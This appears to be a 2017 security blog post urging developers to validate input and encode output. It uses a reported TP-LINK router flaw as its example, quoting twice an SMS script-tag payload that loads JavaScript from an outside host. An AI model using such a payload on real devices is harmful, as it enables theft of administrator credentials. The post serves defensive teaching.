Filter By:

Recent Podcasts

Back to Insights

Van Wyk: Get a Handle on Your Data

April 13, 2017 | Data Loss Prevention (DLP)
By Ken Van Wyk, IANS Faculty


Ken van Wyk

“Imagine dropping a squirrel into the middle of a golden retriever conference.”

That's a pretty simple sentence, right? In a word processor, it’s just English text data. But when you mix in human imagination, it becomes something far more dynamic (either that, or you need an imagination upgrade).

So, why was anyone surprised when it was announced that a TP-LINK router contained a vulnerability that could be exploited by sending it an SMS text containing “<script src=//n.ms/a.js></script>?”

Remember, one person’s data is another person’s active content.

Sure, that JavaScript shouldn’t have given the attacker a copy of the router’s admin username and password, but it does (reportedly, anyway – I haven’t verified it, but for the purpose of this discussion, let's assume it to be accurate). After all, SMS should simply consist of a phone number and 160 characters of static alphanumeric text data.

Just data, right?

I always tell the software developers I work with that it is absolutely vital they know their data, inside and out. Bear in mind, too, that data is transient. It can be static text in one context and something altogether different in another – much like the squirrel example above. The important thing is that the software team knows the data in its software, as well as how it is transported and consumed in every context.

The rule of thumb is that data should be validated on the input side to ensure it conforms to what the recipient is expecting, and it should be filtered on the output side to ensure it cannot cause any harm where it is being consumed.

In other words, that “<script src=//n.ms/a.js></script>” should have been filtered out by whatever component was sending untrusted data (it came from the user, after all) into an HTML interpreting environment. At a bare minimum, the “<“ should become “&lt,” and so on. In practice, it’s more complicated, because you also have to anticipate malicious input data that is encoded using one of a variety of encoding schemes. Nonetheless, the untrusted data should have been prevented from causing harm downstream where it was consumed.

But, it wasn’t.

At the downstream end, the HTML interpreting engine would have no way of knowing if the data was intentional or not, so of course it was going to run the script. Mind you, the mere presence of a script like “a.js” that returns the administrative username and password should also be viewed as a lapse in judgment on someone’s part. Build it and they will come — or, in this case, build it and someone will run it.

Getting to the Root of the Problem

So ultimately, there’s culpability to go around in this case. But the main point I want to make is that you need to know your data. Know what should be there and block all else. Prevent untrusted data from causing harm downstream. “Defang” the data before handing it to someone else. Failing to do these things will lead to bad results every time.

This shouldn’t even be a new lesson to us. Remember buffer overflows? It’s actually a very similar problem. Shove a bunch of machine code into a data stack, including enough data to overwrite the instruction pointer (data) so that it will end up pointing to the memory address of the machine code. And voilà: Your machine code data becomes executing machine code – machine code that was passed to the victim by way of a “data” channel (yes, there are many protections against these things in modern CPU architectures, but that’s beside the point).

Clearly, this whole intermingling of data and executable content – or “active content” as it’s often called in web application environments – isn’t a problem we’ve solved yet. We’ve applied a bit of duct tape and bubble gum here and there, but the problem persists.

I recently overheard a colleague discussing highly secure web browser environments, who said “you absolutely have to block active content.” Of course, this doesn't make much sense because what's active in one context is passive in another. So whenever I hear those words, I just chuckle to myself and think, "Go jump in a lake." 

 

***

Ken Van Wyk is president and principal consultant at KRvW Associates and an internationally recognized information security expert, author and speaker. He’s been an infosec practitioner in commercial, academic, and military organizations and was one of the founders of the Computer Emergency Response Team (CERT) at Carnegie Mellon University.


Related Research

10/18/2017 | Faculty Report
Configuration Management: Driving the Future of Security


10/16/2017 | Ask-an-Expert
9 Ways to Protect Data in Office 365


10/6/2017 | Faculty Report
IANS Vulnerability and Breach Update: Q3 2017


9/29/2017 | Faculty Report
Toning Up the Vulnerability Management Core